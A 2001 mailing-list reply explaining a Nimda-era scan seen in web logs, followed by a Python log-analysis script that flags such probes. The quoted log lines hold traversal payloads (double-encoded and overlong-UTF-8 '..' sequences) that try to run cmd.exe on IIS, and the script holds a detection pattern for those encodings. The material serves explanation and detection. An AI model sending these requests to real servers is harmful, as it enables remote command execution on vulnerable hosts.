From: Scott Gifford (sgiffordsuspectclass.com)
Date: Mon Oct 08 2001 - 21:27:42 CDT

    "Rob 'Feztaa' Park" <fezzikerhome.com> writes:

    > Is this some kind of new worm, or is this part of Nimda?
    >
    > ...
    > 24.79.126.53 - - [04/Oct/2001:22:04:45 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:48 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:50 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 43 "-" "-"
    > 24.79.126.53 - - [04/Oct/2001:22:04:53 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"
    > ...
    >
    > I think that's pretty messed up that all 10 of those happened within 7
    > seconds of each other... My logs are full of this crud.
    >
    > Thanks in advance :)

    Nimda opens up the hole that this is trying to exploit. You can see
    it trying to run cmd.exe as a CGI script, passing it the parameters
    "/c dir". That would (not surprisingly) run the "dir" command through
    NT's command interpreter, "cmd.exe". It's trying all sorts of
    locations and making some half-hearted attempts to trick IIS into
    running it even if it's not Nimda infected, by using international
    encodings and such.

    Looks like a scan; probably a shell script somebody threw together.
    I'm not looking forward to finding out what they plan on doing with
    their piles of zombie IIS servers...

    ----ScottG.
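The kind of check a log reviewer would want for entries like the ones quoted above, added here as an example and not part of the original thread: it parses combined-format lines, decodes the request path twice (the way a double-decoding server turns %255c into a backslash), flags requests that name cmd.exe or root.exe or carry encoded traversal sequences, and reports any source that sends a burst of such probes within a few seconds. The sample input is the ten requests from the post plus one constructed benign request; the burst threshold and window are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache "combined" log format, the layout of the lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators taken from the quoted requests: the programs the scanner asks the
# web server to run, and the escape sequences it uses to hide ".." from a
# naive path check (double-encoded slashes, overlong UTF-8 forms of '/' and '\').
SUSPICIOUS_TARGETS = ("cmd.exe", "root.exe")
ENCODED_TRAVERSAL = re.compile(r"%25(5c|2f)|%c0%(af|2f)|%c1%(1c|9c)", re.IGNORECASE)


def parse_line(line):
    """Split one combined-format line into fields; None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def decode_path(raw):
    """Decode twice, as a double-decoding server would: %255c -> %5c -> '\\'.
    Overlong sequences such as %c0%af are rejected by Python's UTF-8 decoder
    and come out as U+FFFD, so those are caught by ENCODED_TRAVERSAL instead."""
    return unquote(unquote(raw))


def classify(entry):
    """Return the list of reasons a request looks like a cmd.exe probe."""
    reasons = []
    raw = entry["path"]
    decoded = decode_path(raw)
    if any(t in decoded.lower() for t in SUSPICIOUS_TARGETS):
        reasons.append("command-interpreter request")
    if ENCODED_TRAVERSAL.search(raw):
        reasons.append("encoded traversal")
    if ".." in decoded.replace("\\", "/").split("/"):
        reasons.append("dot-dot segment after decoding")
    return reasons


def parse_ts(ts):
    """Parse the bracketed timestamp, e.g. 04/Oct/2001:22:04:45 -0600."""
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")


def scan(lines, burst_threshold=5, window_seconds=10):
    """Return (flagged entries, bursts). A burst is one source sending at least
    burst_threshold flagged requests inside window_seconds (assumed values);
    the post shows ten such hits from one address in a few seconds."""
    flagged = []
    seen = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            flagged.append((entry["ip"], entry["path"], entry["status"], reasons))
            seen[entry["ip"]].append(parse_ts(entry["ts"]))
    bursts = {}
    for ip, stamps in seen.items():
        stamps.sort()
        span = (stamps[-1] - stamps[0]).total_seconds()
        if len(stamps) >= burst_threshold and span <= window_seconds:
            bursts[ip] = (len(stamps), span)
    return flagged, bursts


# Sample input: the ten requests quoted in the post, followed by one
# constructed benign request that must not be flagged.
SAMPLE_LINES = [
    '24.79.126.53 - - [04/Oct/2001:22:04:45 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:48 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:49 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:50 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 43 "-" "-"',
    '24.79.126.53 - - [04/Oct/2001:22:04:53 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 43 "-" "-"',
    '10.0.0.5 - - [04/Oct/2001:22:05:10 -0600] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    hits, bursts = scan(SAMPLE_LINES)
    for ip, path, status, why in hits:
        print(f"{ip} {status} {path}\n    {', '.join(why)}")
    for ip, (count, span) in bursts.items():
        print(f"burst: {ip} sent {count} probes in {span:.0f}s")
```

The 403/404 responses in the quoted lines already show these probes failing against a non-IIS host; the value of a pass like this is in the per-source burst, which separates a scanner working through its list of paths from a single stray request, and in the decoded path, which shows what the request would have resolved to on a server that decodes twice.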